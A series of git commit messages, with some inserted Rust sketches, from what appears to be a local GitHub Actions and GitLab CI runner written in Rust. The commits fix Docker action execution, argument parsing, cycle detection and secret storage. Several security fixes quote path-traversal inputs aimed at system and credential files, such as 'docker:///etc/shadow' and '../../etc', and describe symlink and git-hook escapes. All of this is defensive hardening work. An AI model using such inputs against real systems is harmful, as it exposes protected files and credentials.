- Allow empty `cmd` in `run_container` to mean "use the image's default ENTRYPOINT/CMD". The Docker impl now sets `config.cmd = None` when cmd is empty. Podman already handled this correctly.
The existing `PreparedAction::Image` path with all its special-cased action handling (actions-rs, checkout, etc.) is completely untouched.
Closes #59
* fix(executor): fix macOS entrypoint hang, path traversal, and silent emulation pass
Three bugs in the Docker action execution path from the previous commit:
1. The macOS emulation entrypoint override (`bash -l -c`) was applied *unconditionally*, even when cmd was empty (NativeDocker path). That means Docker actions running on macOS emu images would get bash with no argument, which either hangs forever or exits immediately. The image's real ENTRYPOINT gets discarded either way. This is not great. Fix: capture `has_cmd` before cmd_vec is moved into the config, only apply the bash wrapper when there's actually a command to wrap.
2. The `dockerfile_rel` extracted from action.yml's `runs.image` was not sanitized after stripping the `docker://` prefix. A malicious action.yml with `docker:///etc/shadow` or `../../sensitive` would escape the action directory via Path::join's absolute-path behavior or dotdot traversal. Fix: strip leading slashes and reject any path containing `..`.
3. Emulation mode returned exit_code 0 for Docker actions it *didn't actually run*. Users got a green checkmark for actions that were silently skipped. Confusion ensues. Fix: return exit_code 1 with a clear stderr message explaining the action was not executed and needs --runtime docker.
While at it, add tests for all three fixes: NativeDocker variant construction, dockerfile path sanitization (6 cases), and emulation empty-cmd failure behavior.
* fix(executor): harden Docker action security and fix docker:// execution path
Three issues found during review, all in the Docker action plumbing:
1. The `is_docker` path in `prepare_action()` was returning `PreparedAction::Image` instead of `NativeDocker`, which means `docker://` prefixed actions in `uses:` went straight through the legacy echo-command path and *never actually executed*. Same class of bug we just fixed for DockerBuild, hiding in plain sight.
2. The path traversal check for Dockerfile paths used `contains("..")`, which rejects perfectly legitimate directory names like `foo..bar/`. Check for `..` as an actual path *component* instead via `split('/').any(|c| c == "..")`.
3. `build_image_inner` was calling `append_dir_all` on untrusted action repositories without disabling symlink following. A malicious action repo could plant a symlink pointing at the host filesystem and have its contents shipped into the Docker build context. That's the kind of thing that makes security auditors lose sleep. Set `follow_symlinks(false)` on the tar builder.
* fix(executor): wire up runs.entrypoint, runs.args, and fix local Docker dispatch
The previous commits got the NativeDocker path working for remote actions, but left several holes that a code review correctly identified. Let's fix them all.
First, local Docker actions (uses: ./my-action with a Dockerfile) were *still* returning PreparedAction::Image instead of NativeDocker. Same class of bug we just fixed for remote actions, hiding one function call away. They now go through NativeDocker and parse the local action.yml for entrypoint/args.
Second, runs.entrypoint and runs.args from action.yml were being completely ignored. Docker actions that declare their entrypoint in action.yml (which is, you know, *a lot of them*) would silently use the wrong entrypoint. Add an entrypoint parameter to the ContainerRuntime trait and thread it through all four implementations: Docker sets Config.entrypoint, Podman passes --entrypoint, and the emulation runtimes accept-and-ignore it.
Third, with.args from workflow steps (uses: docker://alpine with args: "echo hello") was not being passed as container CMD. It now overrides runs.args when present, matching GitHub Actions behavior.
While at it:
- Extract sanitize_dockerfile_rel into a real function instead of having the tests duplicate the logic and test their own copy. Testing a copy of your code instead of the actual code is not what I'd call confidence-inspiring.
- Add canonicalize() defense-in-depth after Dockerfile path resolution to catch symlink escapes.
- Document the build_image_inner context directory invariant.
* fix(executor): fix broken args parsing, empty dockerfile path, and silent entrypoint drop
Three correctness bugs found during review of the Docker action execution path:
1. with.args was being split on whitespace like a caveman. An argument like "hello world" would turn into two separate args, which is *not* how GitHub Actions works. Use shlex::split() for proper shell-word parsing, with a whitespace fallback for malformed input that shlex chokes on.
2. sanitize_dockerfile_rel() happily accepted empty strings. Feed it "" or "docker://" and it would produce an empty path, which then joins to a directory instead of a file. The subsequent docker build would fail with a confusing error. Let's just reject empty paths upfront.
3. SecureEmulationRuntime silently swallowed the entrypoint override without telling anyone. If you're running in secure emulation mode and your action specifies runs.entrypoint, you deserve to know it's being ignored, not left wondering why your action isn't doing what you expect.
* fix(executor)!: pass explicit build context to Docker image builds
It turns out that build_image_inner was deriving the Docker build context from dockerfile.parent(), which is *wrong* when the Dockerfile lives in a subdirectory of the action root. An action with runs.image: subdir/Dockerfile would get subdir/ as its build context instead of the action root, silently breaking every COPY instruction that references files outside that subdirectory.
The fix is straightforward: add an explicit context_dir parameter to the ContainerRuntime::build_image trait so callers tell us what the context is instead of us guessing from the Dockerfile path. The DockerBuild path in engine.rs now passes &action_dir, and the Docker inner implementation computes the Dockerfile path relative to context_dir via strip_prefix instead of just using file_name().
While at it, add a warning log when shlex::split fails to parse with.args (unmatched quotes). Previously this silently fell back to naive whitespace splitting, which is the kind of thing that makes you stare at container logs for an hour wondering why your quoted argument got split into three pieces.
* fix(executor): reject bad dockerfile paths instead of silently guessing
Three bugs found during review:
The build_image_inner strip_prefix fallback was *silently* using just the filename when the Dockerfile wasn't a clean descendant of the context directory. So if something weird happened with the path, you'd just get the wrong Dockerfile used for the build with zero indication anything went wrong. That's not a fallback, that's a footgun. Return an error instead.
sanitize_dockerfile_rel was happily preserving a leading "./" from the raw path, which then caused strip_prefix to fail (because "./build/Dockerfile" is not a prefix-match for a joined path). Strip it early so the downstream path arithmetic actually works.
While at it, extract_docker_runs_config was using filter_map on runs.args, which means non-string YAML values like integers and booleans were silently dropped. GitHub Actions coerces those to strings, so we should too.
* fix(executor): handle string-form args and reject malformed with.args
It turns out that extract_docker_runs_config only handled runs.args as a YAML sequence. If an action.yml declared args as a plain string (which GitHub Actions absolutely allows), we'd silently drop the entire argument. Not great.
While at it, the with.args parser had the opposite problem: when shlex::split hit an unmatched quote, it shrugged and fell back to naive whitespace splitting. That's the kind of "graceful degradation" that produces subtly wrong container invocations and makes you spend an afternoon wondering why your action is getting the wrong flags.
Fix both: extract_docker_runs_config now handles args as either a YAML sequence or a string (shell-tokenized via shlex). The with.args path now returns a hard error on malformed quoting instead of pretending everything is fine.
Added tests for string-form args including the bad-quoting edge case.
* fix(executor): close sub_path traversal hole and make args parsing consistent
It turns out that sub_path from action references (the part after owner/repo in owner/repo/some/subdir) was being joined to the clone directory with absolutely no sanitization. A crafted sub_path like "../../etc" would escape the cloned repo and get passed as the Docker *build context*. Please don't do that.
Add sanitize_sub_path() that rejects any path component equal to "..", and apply it in both the DockerBuild and Composite action paths. For DockerBuild, also canonicalize the resolved action_dir and verify it's still inside the repo_dir, because symlinks exist and trusting user-controlled paths is how we end up on HN.
While at it, fix a behavioral inconsistency in args parsing: bad quoting in action.yml's runs.args was silently falling back to the raw string, while the exact same bad quoting in a workflow's with.args was a hard error. Now both are errors, because silently doing the wrong thing is worse than loudly refusing.
* fix(executor): harden Docker build context, sanitize inputs, deduplicate mount setup
The PR review flagged several issues ranging from correctness to performance to plain old code smell. Let's address them all.
It turns out that build_image_inner was happily tarring the *entire* context directory and shipping it to the Docker daemon, cheerfully ignoring any .dockerignore file. For large action repos with test fixtures, docs, and who knows what else, this is not great. When a .dockerignore exists, we now use the `ignore` crate's WalkBuilder to walk only non-ignored files. Falls back to the old append_dir_all when there's no .dockerignore, because we're not breaking anything that already works.
The sanitize_sub_path and sanitize_dockerfile_rel functions checked for ".." traversal but not null bytes, which can cause truncation at OS boundaries and potentially bypass the traversal check. Please don't do that. Added null byte rejection to both.
extract_docker_runs_config was taking &Option<T> instead of Option<&T>, which is the Rust equivalent of wearing your shirt inside out: it works, but everyone who sees it knows something is wrong. Fixed the signature and all callers.
The with.args empty-string handling was also wrong: `with.args: ""` was treated as "no override" instead of "pass zero args", which doesn't match GitHub Actions behavior where the presence of the key is the signal, not its value.
While at it, extracted the volume/env/mount setup boilerplate that was copy-pasted across three execution paths into a StepContainerContext helper. Not because I enjoy moving code around, but because the same 12 lines in three places is not my idea of maintainability.
* fix(executor): cap build context size, disable git hooks, add NativeDocker tests
Three security and reliability fixes from the PR review:
The build_image_inner tar buffer was completely unbounded: a malicious or just absurdly large action repo with no .dockerignore would happily try to load the entire thing into memory. Now we track cumulative file sizes and bail at 500 MB. The old append_dir_all fallback had to go since it gives us no per-file hook; replaced it with an ignore::WalkBuilder walk (already a dep) so both paths enforce the same limit.
shallow_clone was happily running git checkout on untrusted repos without disabling hooks. A cloned repo's .git/hooks/post-checkout runs automatically, which is the kind of thing that makes security reviewers lose sleep. Pass -c core.hooksPath=/dev/null to every git invocation so cloned repos can't execute anything on our host.
While at it, add a MockContainerRuntime and four integration tests that exercise the NativeDocker execute_step path end-to-end: entrypoint passthrough, with.args override + INPUT_* injection, empty args, and step/job env propagation. This path previously had zero test coverage for the runtime flow.
* fix(executor): deduplicate build context walker, harden sub_path, add missing tests
The build_image_inner code in docker.rs had two near-identical ~50-line walker loops: one for when .dockerignore exists and one for when it doesn't. The *only* difference was a single add_custom_ignore_filename() call on the builder. Copy-paste like that drifts. Let's not.
Merged into a single loop with a conditional on the WalkBuilder before iteration. Same behavior, half the code.
While at it, sanitize_sub_path now splits on both '/' and '\' so a Windows-style traversal like "a\..\..\etc" doesn't sneak past the check. Also expanded the PreparedAction::Image doc comment to explain which code paths still produce it and why it's distinct from NativeDocker; future contributors shouldn't have to guess.
Added tests for: unmatched-quote error path in with.args, with.args overriding runs.args, and backslash path traversal in sub_path.
* fix(executor): close backslash traversal gap and add with.entrypoint override
It turns out that sanitize_dockerfile_rel was only splitting on '/' to catch ".." traversal, while its sibling sanitize_sub_path was correctly splitting on both '/' and '\\'. So a crafted Dockerfile path like "..\\..\\etc\\shadow" would sail right past the sanitizer. The canonicalize() defense-in-depth below *would* catch this in practice, but relying on one security layer to cover a hole in another is not great. Let's just make them consistent.
While at it, the NativeDocker execution path was missing support for with.entrypoint, a documented GitHub Actions feature that lets workflow steps override the Docker container's ENTRYPOINT. We were already handling with.args but silently ignoring with.entrypoint, which is the kind of asymmetry that bites you the moment someone actually tries to use it.
* fix(executor): close composite sub_path symlink hole and filter empty entrypoint
The DockerBuild handler had a proper canonicalize + starts_with defense-in-depth check after resolving sub_path, but the composite action handler just blindly trusted sanitize_sub_path() and called repo_dir.join(p) without verifying the result stayed inside the cloned repo. A symlink named "legit" pointing to "../../secrets" would sail right through the string-only sanitizer. That is not great.
Add the same canonicalize + starts_with check to the composite action path so both handlers have identical protection.
While at it, filter empty-string entrypoint values to None in both extract_docker_runs_config and the Docker runtime layer. An empty runs.entrypoint in action.yml should mean "use the image default", not "tell Docker to clear the entrypoint", which is what passing Some("") actually does.
Added tests for both the with.entrypoint override path and the empty entrypoint filtering.
* fix(executor): filter empty podman entrypoint and extract NativeDocker step handler
The podman runtime was happily passing `--entrypoint ""` to podman when a workflow set `with.entrypoint: ""`, while Docker correctly filtered it out via `.filter(|s| !s.is_empty())`. So the two runtimes silently diverged on empty entrypoint behavior. Not great.
Add the same filter to podman's entrypoint handling so both runtimes treat empty strings as "use the image default."
While at it, extract the ~90-line NativeDocker match arm from execute_step into its own `execute_native_docker_step` function. That match block was getting unwieldy, and this keeps each action type's execution logic self-contained.
Also drop a TODO on the in-memory tar buffer in build_image_inner: it holds the entire build context in a Vec<u8>, which gets uncomfortable as repos approach the 500 MB cap.
|
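The Dockerfile-path rules accumulated across the commits above (strip `docker://` and leading slashes, strip a leading `./`, reject empty paths, reject null bytes, reject `..` as a whole component on either separator) can be sketched roughly as follows. This is a hypothetical reconstruction from the commit messages only; the real `sanitize_dockerfile_rel` signature, error type, and ordering of checks are assumptions.

```rust
/// Hypothetical sketch of a Dockerfile-path sanitizer. Returns the cleaned
/// relative path, or a message describing why the input was rejected.
pub fn sanitize_dockerfile_rel(raw: &str) -> Result<String, String> {
    // Null bytes can truncate paths at OS boundaries, so refuse them outright.
    if raw.contains('\0') {
        return Err("path contains a null byte".to_string());
    }
    // Drop an optional docker:// scheme, then any leading slashes, so that
    // Path::join is never handed an absolute path.
    let mut rel = raw.strip_prefix("docker://").unwrap_or(raw);
    rel = rel.trim_start_matches('/');
    // Drop leading "./" segments so later strip_prefix arithmetic works.
    while let Some(rest) = rel.strip_prefix("./") {
        rel = rest.trim_start_matches('/');
    }
    if rel.is_empty() {
        return Err("empty Dockerfile path".to_string());
    }
    // Reject ".." only as a whole component, splitting on '/' and '\'.
    if rel
        .split(|c: char| c == '/' || c == '\\')
        .any(|part| part == "..")
    {
        return Err(format!("path traversal in {:?}", rel));
    }
    Ok(rel.to_string())
}
```

A string check like this is only the first layer; the commits also describe a `canonicalize()` plus `starts_with` check afterwards, since symlinks can escape a directory without any `..` in the path.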
||
|
|
8a8d7e5eec |
fix: resolve correctness, security, and parsing bugs across codebase (#73)
* fix: resolve 10 bugs found during full codebase review
- Fix memory leak from Box::leak() in status bar render loop
- Fix AES-GCM nonce reuse vulnerability in encrypted secret storage
- Fix Default impl for EncryptedSecretStore that discarded encryption key
- Fix early return in list command that prevented GitLab pipeline listing
- Fix double validation call in validate_github_workflow
- Wire --show-action-messages CLI flag through ExecutionConfig
- Add serde(rename = "if") to GitLab Rule if_ field for correct deserialization
- Fix potential panic on multibyte paths in workflow tab path shortening
- Include involved job names in circular dependency error messages
- Improve cron syntax validation to check value ranges, steps, and expressions
* fix: address PR review feedback
- Remove dead `_nonce` parameter from `EncryptedSecretStore::from_data`
- Add clarifying comment for inverted show/hide action messages mapping
- Add comprehensive cron validation tests (valid expressions, out-of-range
values, wrong part count, invalid steps, invalid ranges, edge cases)
* fix: resolve 27 bugs found during full codebase verification
A thorough manual verification of every feature uncovered a
*remarkable* collection of bugs hiding in plain sight. The
highlights:
The `strategy.matrix` YAML structure was never parsed. The Job
struct had `matrix` at the top level, but GitHub Actions nests it
under `strategy.matrix`. Serde silently ignored the `strategy`
key, so matrix expansion code existed but could never run. For
absolutely no reason. Introduce a proper `Strategy` struct and
wire it through the executor.
The Step struct was missing `if`, `id`, `working-directory`,
`shell`, and `timeout-minutes` fields. Step-level conditionals
were silently dropped — every step always ran regardless of its
`if` condition. While at it, `continue-on-error` was in the
struct but had no serde rename and was never checked during
execution. Fix all of that.
The validator cheerfully reported cyclic `needs` dependencies as
"Valid". Add DFS cycle detection so `A -> B -> C -> A` is caught
at validation time instead of blowing up at execution time.
Five of eight GitLab CI test fixtures failed to parse because the
model was too rigid: `extends` only accepted arrays (not strings),
`variables` rejected integers, `cache.key` rejected structured
formats, and `script` rejected single strings. Add custom
deserializers following the existing codebase pattern.
The GitHub trigger function leaked the auth token via curl process
arguments visible in `/proc/[pid]/cmdline`. Replace with reqwest,
matching the pattern already used elsewhere. Also add symlink and
path traversal protections in the executor.
Other fixes: hardcoded matrix variable stripping replaced with
proper substitution, `show_action_messages` wired through TUI,
dead `if true {}` removed, default branch detection uses remote
HEAD instead of current branch, cron validator accepts named
days/months, reusable workflow ref validation loosened from OR
to AND, matrix include entries merge into all matching combos.
* fix: harden step-level evaluation, volume checks, and add tests
The PR review turned up a few things that needed fixing before this
was actually ready.
The step-level `if` condition evaluator was silently reusing the
job-level `evaluate_job_condition` function, which knows nothing
about step-scoped expressions like `steps.<id>.outcome`, `success()`,
`failure()`, `always()`, or `cancelled()`. These would fall through
to the generic "unknown condition" path without so much as a warning.
Now they're detected early, a warning is logged, and they default to
true — which is at least *honest* about the limitation.
The volume path traversal check (`..`) was applied to the entire
volume spec string, meaning a perfectly legitimate container path
like `/safe/host:/container/..weird` would get rejected. The check
now only inspects the host path component after splitting on `:`,
which is the part that actually matters for traversal attacks.
While at it, renamed the awkwardly-named `step_name_for_skip` to
just `step_name` in `execute_matrix_job` for consistency with
`execute_job`, and added a BREAKING_CHANGES.md documenting the
EncryptedSecretStore serialization format change.
Added 19 new tests covering matrix include/exclude merge semantics,
step condition evaluation for unsupported expressions, volume path
traversal edge cases, and continue-on-error + step-level if parsing.
* fix: correct condition defaults, path traversal check, and null variable handling
The previous commit defaulted *all* unsupported step-level
condition functions (failure(), cancelled(), always(), success())
to true. It turns out that defaulting failure() and cancelled()
to true is semantically wrong — it means steps guarded by
`if: failure()` will *always* run, even when nothing failed.
That's not a feature, that's a bug.
Default each function to its most likely state: always() and
success() return true, failure() and cancelled() return false.
Not perfect (we still can't track actual step outcomes), but at
least we're not silently running cleanup steps on every build.
The path traversal check was using `contains("..")` which is a
substring match. A directory literally named `..hidden` would
get rejected. Use Path::components() to detect actual ParentDir
components instead of playing string matching games.
While at it, fix deserialize_variables in the GitLab models to
handle YAML null values as empty strings instead of producing
"~\n". Also trim the catch-all serialization output.
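The two path-traversal refinements described in this commit and the one before it (inspect only the host side of a volume spec, and match real `ParentDir` components rather than the substring `..`) can be sketched as below. The function names are hypothetical, and splitting on the first `:` is a simplification that would mishandle Windows drive letters.

```rust
use std::path::{Component, Path};

/// True when any component of `path` is a literal `..` (ParentDir).
/// A name such as `..hidden` is a normal component and does not match.
pub fn has_parent_dir(path: &str) -> bool {
    Path::new(path)
        .components()
        .any(|c| matches!(c, Component::ParentDir))
}

/// Checks only the host side of a "host:container[:opts]" volume spec.
/// Assumption: the host path is everything before the first ':'.
pub fn volume_host_escapes(spec: &str) -> bool {
    let host = spec.split(':').next().unwrap_or("");
    has_parent_dir(host)
}
```

With this shape, `/safe/host:/container/..weird` passes because the odd name sits on the container side, while `../../etc:/data` is flagged.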
* fix: correct cycle detection, condition evaluation, and matrix continue-on-error
The DFS cycle detector in `dfs_detect_cycle` had a genuinely nasty bug:
when a cycle was found, it returned early *without popping itself from
rec_stack*. This left stale entries that corrupted the stack for
subsequent DFS traversals. Net result: cross-edges to already-visited
nodes would be falsely reported as cycles. A→B→A is a cycle, but
D→E→A is just a cross-edge. The old code couldn't tell the difference.
Fix this properly by introducing a separate `in_stack` HashSet for O(1)
membership checks, while keeping the Vec for path reconstruction. Both
are now correctly cleaned up — no early returns skip the cleanup.
While at it, `execute_matrix_job` was silently ignoring `continue-on-error`
on the Err branch. The non-matrix `execute_job` handled it correctly,
but the matrix path would just abort the entire job. Copy-paste bugs
are fun like that. Let's fix that.
The `evaluate_job_condition` status function handling was doing sequential
`contains()` checks with early returns, which meant compound expressions
like `failure() || success()` would match `failure()` first and return
false. Now we scan for all status functions in one pass and pick the
most permissive default when positive functions are present.
Also: `convert_yaml_to_step` was hardcoding `None` for `if_condition`,
`id`, `working_directory`, `shell`, and `timeout_minutes` despite the
YAML potentially having them. And `is_valid_cron_atom` was rejecting
valid POSIX cron syntax like `5/2`.
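The cycle-detection fix described in this commit (a `HashSet` for O(1) in-stack checks, a `Vec` for path reconstruction, and cleanup on every exit path) might look roughly like the sketch below. It is an illustration under assumed names and types, not the project's `dfs_detect_cycle`; it returns only the first cycle found.

```rust
use std::collections::{HashMap, HashSet};

/// Returns one cycle (as a path of node names) if the graph has any.
pub fn find_cycle(graph: &HashMap<String, Vec<String>>) -> Option<Vec<String>> {
    let mut visited: HashSet<String> = HashSet::new();
    let mut in_stack: HashSet<String> = HashSet::new();
    let mut path: Vec<String> = Vec::new();
    let mut nodes: Vec<&String> = graph.keys().collect();
    nodes.sort(); // deterministic start order despite HashMap iteration
    for node in nodes {
        if !visited.contains(node.as_str()) {
            if let Some(cycle) = dfs(node, graph, &mut visited, &mut in_stack, &mut path) {
                return Some(cycle);
            }
        }
    }
    None
}

fn dfs(
    node: &str,
    graph: &HashMap<String, Vec<String>>,
    visited: &mut HashSet<String>,
    in_stack: &mut HashSet<String>,
    path: &mut Vec<String>,
) -> Option<Vec<String>> {
    visited.insert(node.to_string());
    in_stack.insert(node.to_string());
    path.push(node.to_string());

    let mut found = None;
    for next in graph.get(node).map(Vec::as_slice).unwrap_or(&[]) {
        if in_stack.contains(next.as_str()) {
            // Back edge: the cycle is the path suffix starting at `next`.
            let start = path.iter().position(|n| n == next).unwrap_or(0);
            found = Some(path[start..].to_vec());
        } else if !visited.contains(next.as_str()) {
            found = dfs(next, graph, visited, in_stack, path);
        }
        // An edge to a visited node that is not on the stack is a cross-edge
        // and is deliberately ignored.
        if found.is_some() {
            break;
        }
    }

    // Cleanup runs on every exit path, including when a cycle was found.
    path.pop();
    in_stack.remove(node);
    found
}
```

The key point is that there is a single exit at the bottom of `dfs`, so no early return can leave a stale entry on the stack.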
* refactor(executor): extract step guards into shared helper, fix steps.* default
The step-level if-condition check and continue-on-error handling was
copy-pasted between execute_job and execute_matrix_job with subtly
different control flow — one sets job_success=false and breaks, the
other returns Ok(JobResult{Failure}) immediately. Two copies of the
same logic that *already* disagree is not redundancy, it's a bug
waiting to happen. Let's fix that.
Extract run_step_with_guards() that encapsulates the if-condition
evaluation, execute_step call, and continue-on-error wrapping into
a single StepOutcome enum. Both job execution paths now call this
shared helper.
While at it, fix the condition evaluator defaulting bare steps.*
references to true — "steps.build.outcome == 'failure'" should
*not* optimistically run the step. Now only always() and success()
default to true; everything else (bare step refs, failure(),
cancelled()) conservatively defaults to false.
Also add serde alias "matrix" on Job.strategy so old workflows with
flat matrix: at job level still parse, and document the intentional
or_insert_with in matrix include merging per GitHub Actions spec.
* fix: clean up review findings in step guards, secret store, and test fixture
The PR review flagged three issues worth fixing before merge.
First, run_step_with_guards had a bogus StepStatus::Skipped check
in the abort_job logic. The condition tested for Failure *or*
Skipped, then only actually aborted on Failure — meaning the
Skipped branch did nothing except confuse anyone reading the code.
Simplify to just check Failure directly.
Second, EncryptedSecretStore::from_json would silently fail with a
generic serde error when fed the old serialization format (which
had a shared top-level nonce field). Now it detects the old format
by checking for the "nonce" key and returns a clear error pointing
at BREAKING_CHANGES.md. Added a test for this.
Third, tests/workflows/continue-on-error-test.yml was an orphan
fixture — nothing referenced it. The same content is already
tested inline by parse_continue_on_error_workflow in the parser.
Removed it.
* fix: correct cron day-of-week range, steps. false positive, and Step boilerplate
Three issues from PR review, all straightforward:
The cron validator was rejecting day-of-week value 7, which is a
perfectly valid Sunday alias in both POSIX cron and GitHub Actions.
The max was 6 when it should be 7. The named-value resolver guard
also needed updating from `max == 6` to `max >= 6` so named days
still resolve correctly with the wider range.
The `evaluate_job_condition` heuristic for detecting `steps.*`
references was using a bare `contains("steps.")`, which means an
env var like `env.MY_STEPS_COUNT` would falsely trigger it and
short-circuit to false. Now we check that the character before
"steps." is either start-of-string or non-alphanumeric. Not a
full expression parser, but it stops the obvious false positives.
While at it, add a `Step::with_run` constructor so the GitLab
converter doesn't need three identical 12-field struct literals
that silently break every time someone adds a field to Step.
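The `steps.` boundary heuristic from this commit can be sketched as follows. The function name is hypothetical, and the sketch already treats underscore as a word character, which is the refinement a later fix in this log adds. It is a heuristic, not an expression parser.

```rust
/// True when `expr` contains `steps.` as its own token rather than as the
/// tail of a longer identifier.
pub fn references_steps_context(expr: &str) -> bool {
    const NEEDLE: &str = "steps.";
    expr.match_indices(NEEDLE).any(|(idx, _)| {
        // Look at the character just before the match, if there is one.
        match expr[..idx].chars().next_back() {
            None => true, // match at the very start of the expression
            Some(prev) => !(prev.is_alphanumeric() || prev == '_'),
        }
    })
}
```

For example, `steps.build.outcome == 'failure'` is detected, while a made-up name like `env.my_steps.count` is not, because the character before `steps.` is an underscore.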
* fix: harden steps. boundary check, document condition semantics, dedup cycles
The steps. word-boundary heuristic in evaluate_job_condition was
checking for alphanumeric characters before "steps." to avoid false
positives on env vars like "env.MY_STEPS_COUNT". It turns out that
underscore is *not* alphanumeric, so "env._STEPS_CHECK" would
incorrectly trigger the step-reference path and return false.
While at it, the always() && failure() compound expression returning
true got a proper comment explaining *why* that's intentional — we
lack step-status context locally, so we'd rather over-run than
silently skip steps. Not ideal, but honest.
The DFS cycle detector in detect_cyclic_needs could report the same
cycle multiple times depending on HashMap iteration order. Normalize
cycles by rotating the node list to start at the lexicographically
smallest node, then deduplicate via a HashSet. Same cycle from
different entry points now gets reported exactly once.
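The normalize-then-deduplicate step described above can be sketched like this. Function names and the `Vec<String>` representation of a cycle are assumptions for illustration.

```rust
use std::collections::HashSet;

/// Rotates a cycle so it starts at its lexicographically smallest node.
pub fn normalize_cycle(cycle: &[String]) -> Vec<String> {
    let start = cycle
        .iter()
        .enumerate()
        .min_by(|a, b| a.1.cmp(b.1))
        .map(|(i, _)| i)
        .unwrap_or(0);
    let mut rotated = cycle.to_vec();
    rotated.rotate_left(start);
    rotated
}

/// Keeps the first occurrence of each distinct cycle after normalization.
pub fn dedup_cycles(cycles: &[Vec<String>]) -> Vec<Vec<String>> {
    let mut seen: HashSet<Vec<String>> = HashSet::new();
    let mut unique = Vec::new();
    for cycle in cycles {
        let normalized = normalize_cycle(cycle);
        // insert() returns false when the normalized form was already seen.
        if seen.insert(normalized.clone()) {
            unique.push(normalized);
        }
    }
    unique
}
```

Rotation preserves edge order, so `B -> C -> A` and `C -> A -> B` both normalize to `A -> B -> C` and collapse into one report.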
* fix: squash review nits — double parse, clippy warnings, lost flag
Three leftover issues from the codebase review PR:
The from_json() deserialization was parsing the JSON *twice* — once
into serde_json::Value to sniff for the old nonce field, then again
from the raw string into the actual struct. Parse once, use
from_value() on the already-parsed Value. Not rocket science.
The cycle detector had two clippy warnings: .iter().cloned().collect()
on a slice (just use .to_vec(), please) and .min_by_key() cloning a
double reference instead of comparing properly. Switch to .min_by()
with an explicit cmp.
The show_action_messages flag was being silently dropped in
execute_workflow_cli — hardcoded to false regardless of what the user
asked for. Propagate it through the function signature and the TUI
fallback path so it actually does something.
|
||
|
|
219c27097f |
Merge pull request #72 from bahdotsh/fix/module-review-bugs
fix: correct multiple bugs found during full codebase review |
||
|
|
b49276a026 |
fix: stop hard-exiting on unreadable directory and add #[must_use] to ContainerOutput
The validate subcommand was calling std::process::exit(1) when a directory couldn't be read, which is a rather aggressive response to a permission error. Especially when the code four lines above handles a *missing* path by setting validation_failed and moving on to the next one. Consistency is nice. Let's have some.
Split the match from the method chain (because continue is a statement, not an expression, and Rust has opinions about that) and replaced the exit(1) with the same continue pattern.
While at it, slap #[must_use] on ContainerOutput so the compiler will yell at anyone who discards a run_container result without checking exit_code. All current callers already bind it, so this is purely forward-looking, but the kind of bug it prevents is the silent-misexecution kind, and those are nobody's favorite.
|
||
|
|
422a035c40 |
test: add tests for review fixes and clean up dead code
The previous commit fixed a bunch of bugs but left a few loose ends. The next_job() function still had a redundant bounds check that previous_job() already had cleaned up: the .filter() call makes the inner `if workflow_idx >= self.workflows.len()` dead code. Let's not leave half-finished refactors lying around.
While at it, add tests for the three behavioral changes that *really* should have had tests from the start: emulation runtime returning Ok on non-zero exit codes, log processor not panicking on multi-byte UTF-8 near bracket boundaries, and step validator correctly rejecting steps with only a name field.
Also fix formatting (cargo fmt) and a clippy warning about items defined after the test module.
|
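The multi-byte behavior those log-processor tests cover comes down to never slicing a `&str` at a byte offset that falls inside a character. A minimal sketch using `str::is_char_boundary` follows; backing up to the previous boundary is an assumption made here, since the commit messages do not say how the real code recovers.

```rust
/// Returns the prefix of `s` ending at `end`, backing up to the nearest
/// char boundary at or before `end` instead of panicking mid-character.
pub fn safe_prefix(s: &str, end: usize) -> &str {
    let mut end = end.min(s.len());
    // Offset 0 is always a boundary, so this loop terminates.
    while !s.is_char_boundary(end) {
        end -= 1;
    }
    &s[..end]
}
```

A plain `&s[..end]` would panic when `end` lands inside a multi-byte character such as `é`.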
||
|
|
aa3366a797 |
fix: correct multiple bugs found during full codebase review
It turns out that build_image_inner() in docker.rs was calling .elapsed() on a SystemTime to compute the tar mtime. That gives you "seconds since modification", which is *not* what mtime means. Mtime is seconds since the Unix epoch. The fix is .duration_since(UNIX_EPOCH) like a normal person would use.
While at it, the docker logs() call was passing None for options, which means it wasn't actually requesting stdout or stderr. So we were collecting logs from a stream that might not have any. Explicitly set stdout: true and stderr: true.
The emulation runtime had a fun behavioral mismatch with Docker and Podman: it returned Err on non-zero exit codes, swallowing all stdout/stderr output. Docker and Podman return Ok with the exit code and let the caller decide what to do. The engine already handles non-zero exit codes in the Ok path, so the emulation was just silently eating useful output for no reason.
The UI had a bounds check in next_job() that was mysteriously absent from previous_job(), the kind of inconsistency that waits patiently for someone to hit a stale workflow index and get a panic. Added the same .filter() guard.
String slicing in the log processor wasn't checking char boundaries, which is fine until someone's log contains a multi-byte UTF-8 character before a bracket. Added is_char_boundary() checks.
Step validation was accepting steps with only a 'name' field and no 'uses' or 'run', which is not a valid step in GitHub Actions. Fixed the validation to require at least one of the two fields that actually *do* something.
Replaced .expect() calls on directory reads in main.rs with proper error handling. Panicking because a directory isn't readable is not a great user experience.
|
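The mtime fix in this commit is the difference between `SystemTime::elapsed()` (time since the file changed) and `duration_since(UNIX_EPOCH)` (the timestamp itself). A minimal sketch, with a hypothetical helper name and an assumed fallback of 0 for pre-epoch times:

```rust
use std::time::{SystemTime, UNIX_EPOCH};

/// Seconds since the Unix epoch for a modification time, which is what a
/// tar header's mtime field expects. Pre-epoch times fall back to 0 here.
pub fn mtime_secs(modified: SystemTime) -> u64 {
    modified
        .duration_since(UNIX_EPOCH)
        .map(|d| d.as_secs())
        .unwrap_or(0)
}
```

In practice the input would come from something like `std::fs::metadata(path)?.modified()?`.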
||
|
|
debd89b8c6 |
Merge pull request #71 from bahdotsh/fix/58-support-job-container-directive
fix(executor): support job-level container directive |
||
|
|
3296ad1f62 |
fix(executor): guard against empty container image and volume paths
It turns out that if someone writes `container:` with an empty image
string, we'd happily pass "" to Docker and let it figure out what
that means. Spoiler: it doesn't.
Similarly, volume specs like "/host:" or ":/container" would produce
a PathBuf::from("") mount, which is the kind of thing that makes
container runtimes *very* unhappy. Let's just skip those with a
warning instead of pretending they're valid.
While at it, replace the derived Serialize on ContainerCredentials
with a custom impl that redacts the password field. The Debug impl
was already doing this, but serde_json::to_string was still happily
dumping passwords in plaintext. Please don't do that.
|
||
|
|
2c2a633e0e |
fix(executor): harden container config against credential leaks and empty volumes
ContainerCredentials had a derived Debug impl that would happily dump passwords into logs, panic output, and anywhere else Debug gets called. That's *exactly* the kind of thing that bites you at 3am when someone adds a debug trace and suddenly credentials show up in plaintext in your log aggregator. Replace the derived Debug with a manual impl that redacts the password field.
While at it, add a guard for empty volume specs that would otherwise produce undefined Docker behavior, a note about the splitn limitation with Windows paths, and fix clippy warnings on the test assertions. |
||
